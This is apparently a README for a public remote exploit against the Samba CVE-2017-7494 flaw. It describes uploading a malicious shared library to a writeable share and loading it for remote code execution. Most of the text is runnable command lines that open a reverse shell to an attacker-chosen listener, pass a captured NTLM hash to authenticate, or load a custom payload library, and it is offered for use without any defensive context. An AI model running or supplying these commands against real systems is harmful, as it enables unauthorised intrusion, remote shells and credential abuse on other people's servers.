Remote exploit for the SAMBA CVE-2017-7494 vulnerability aka is_know_pipename!
This exploit is divided in 3 parts:
- Compiles the evilLib in following archs: x86_64 , x86, or i686
- Finds a writeable share and uploads evilLib to it!
- Loads evilLib, if everything goes right, RCE!
As long as the target is vulnerable and the payload is correct for the target operating system and architecture, the exploit is quite reliable.
Run the exploit against your target and wait until shell spawns:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
For samba version 3.5.0 > 3.6.0, you just need add the argument -o 1
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
Run your own custom .so
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
For custom samba port use the argument -p
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
In case you bump into smbpasswd hashes and cannot crack them, You can now pass-the-hash using the argument --hashes=LM:NT
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
This repo is inspired from repo: joxeankoret/exploit-CVE-2017-7494 and Archivaldo